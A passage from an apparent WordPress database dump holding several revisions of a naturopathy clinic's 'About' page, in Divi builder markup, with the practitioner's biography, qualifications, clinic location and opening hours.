text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 21:41:02','2021-05-27 13:41:02','',27,'https://verdenaturopathy.com.au/?p=271',0,'revision','',0),(269,1,'2021-05-27 21:37:20','2021-05-27 13:37:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 21:37:20','2021-05-27 13:37:20','',27,'https://verdenaturopathy.com.au/?p=269',0,'revision','',0),(173,1,'2021-05-26 14:53:32','2021-05-26 06:53:32','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-26 14:53:32','2021-05-26 06:53:32','',27,'https://verde.desidrivers.com.au/?p=173',0,'revision','',0),(264,1,'2021-05-27 21:32:35','2021-05-27 13:32:35','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span 